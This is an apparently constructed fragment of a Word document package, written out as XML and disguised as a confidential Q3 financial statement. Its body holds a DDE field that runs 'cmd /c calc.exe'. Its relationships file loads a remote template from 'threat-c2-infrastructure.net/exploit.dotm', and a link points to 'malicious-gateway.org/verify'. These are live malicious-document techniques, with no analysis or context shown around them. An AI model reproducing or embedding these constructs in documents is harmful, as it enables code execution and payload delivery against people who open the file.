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Quarterly Financial Results and Auditing Records</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr="=cmd|'/c calc.exe'!A0"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>External link: https://malicious-gateway.org/verify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attachedTemplate" Target="https://threat-c2-infrastructure.net/exploit.dotm" TargetMode="External"/>
</Relationships>
</file>

<file path=docProps/core.xml><?xml version="1.0" encoding="utf-8"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <dc:title>Q3 Confidential Financial Statement</dc:title>
  <dc:creator>Threat Financial Group</dc:creator>
</cp:coreProperties>
</file>